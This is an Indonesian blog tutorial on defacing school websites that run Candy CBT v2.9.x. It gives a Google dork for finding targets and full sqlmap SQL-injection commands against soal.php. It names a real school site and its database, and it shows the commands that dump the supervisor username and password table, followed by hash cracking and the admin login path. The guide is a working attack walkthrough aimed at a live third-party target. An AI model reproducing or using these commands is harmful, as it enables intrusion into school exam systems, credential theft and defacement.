cara deface Candy CBT V2.9.x

 Cara Deface poc Candy CBT 2022



Hai saya Rakhaa Yonanda, di artikel ini saya akan membagikan sedikit materi tentang deface, nah untuk proof of concept seperti judul ialah cms Candy CBT versi 2.9 keatas. sebelumnya saya terimakasih kepada mas hari telah menemukan exploit untuk versi 2.9 kalian bisa mampir di blog beliau blog mas hari . sebelum kita lanjut gw jelasin sedikit tentang deface yah.

Arti Deface / Defacing pada website

Deface merupakan salah satu kegiatan merubah tampilan suatu website baik itu halaman utama, index file, atau pun halaman lain yang masih terikat dalam satu url dengan website tersebut. Kegiatan ini sendiri kerap disalahgunakan oleh para peretas untuk mengganggu website-website tertentu, tidak menutup kemungkinan dengan website acak.

Exploit Candy CBT 2.9.x

baiklah kita mulai caranya, sebelumnya kita siapkan bahan-bahan nya, disini kita memerlukan bantuan sebuah tools sqlmap dan Tools buat hash passwordnya debcrypt Tools kalian bisa cek di bawah ini.
Download / install sqlmap LINK 
Download / install ToolHash debcrypt LINK 

Nah jika alat tempur sudah siap, kita gas ke cara esekusinya hehe.

dork : intext:Support By X-Candy CBT v2.9.2 r1 (kembangkan lagi di cara ngembangin dork )
Payload: sqlmap.py -u "http://targetnya.sch.id/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10
Live Target : "http://cbt.miamanahruteng.sch.id/

Mulai Ekseskusi


nah kalian ketikan payload kedalam tools sqlmap seperti gambar diatas, atau lebih detailnya seperti ini : python3 sqlmap.py -u ""http://cbt.miamanahruteng.sch.id/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10

maka hasilnya seperti ini :

cara deface candy cbt v2.9.2

[*] information_schema
[*] u807586548_cbt_miamanah

muncul nama database nya, karena table dari databasenya adalah pengawas dan isinya username dan password, maka gunakan payload seperti ini :

 -D nama_database -T pengawas -C username,password --dump (Ganti -dbs dengan Payload Ini)


karena databse live target kita adalah (u807586548_cbt_miamanah) maka payloadnya adalah :

python3 sqlmap.py -u "http://cbt.miamanahruteng.sch.id/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -D u807586548_cbt_miamanah -T pengawas -C username,password --dump --dbms mysql --thread 10

langsung kita esekusi.

exploit candy cbt

nah, muncul username dan passwordnya. selanjutnya ngapain? ngudud hehe 
selanjutnya kita hash passwordnya sambil nyebats nunggu, oke kita gunakan tools yang sudah kita siapkan tadi maka hasilnya seperti ini.

cara deface cbt

kira" penggunaan toolsnya seperti gambar diatas. untuk halaman loginya adalah :
webnya.com/panel/login/php 

mungkin sekian dari saya.
sumber refrensi : https://ecchiexploit.blogspot.com/





Posting Komentar (0)
Lebih baru Lebih lama